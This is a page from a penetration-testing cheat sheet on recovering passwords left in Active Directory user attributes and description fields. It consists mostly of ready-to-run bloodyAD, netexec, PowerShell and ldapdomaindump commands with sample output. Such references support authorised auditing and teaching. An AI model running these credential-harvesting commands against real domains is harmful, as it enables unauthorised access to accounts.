daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

pwd-comments.md (1911B)


      1 ---
      2 title: "Password - AD User Comment"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/pwd-comments.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/pwd-comments.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Password - AD User Comment
     12 
     13 There are 3-4 fields that seem to be common in most Active Directory schemas: `UserPassword`, `UnixUserPassword`, `unicodePwd` and `msSFU30Password`.
     14 
     15 * Windows/Linux command
     16 
     17     ```ps1
     18     bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(|(userPassword=*)(unixUserPassword=*)(unicodePassword=*)(description=*))' --attr userPassword,unixUserPassword,unicodePwd,description
     19     ```
     20 
     21 * Password in User Description
     22 
     23     ```powershell
     24     netexec ldap domain.lab -u 'username' -p 'password' -M user-desc
     25     netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -M get-desc-users
     26     GET-DESC... 10.0.2.11       389    dc01    [+] Found following users: 
     27     GET-DESC... 10.0.2.11       389    dc01    User: Guest description: Built-in account for guest access to the computer/domain
     28     GET-DESC... 10.0.2.11       389    dc01    User: krbtgt description: Key Distribution Center Service Account
     29     ```
     30 
     31 * Get `unixUserPassword` attribute from all users in ldap
     32 
     33     ```ps1
     34     nxc ldap 10.10.10.10 -u user -p pass -M get-unixUserPassword -M getUserPassword
     35     ```
     36 
     37 * Native Powershell command
     38 
     39     ```powershell
     40     Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
     41     ```
     42 
     43 * Dump the Active Directory and `grep` the content.
     44 
     45     ```powershell
     46     ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/
     47     ```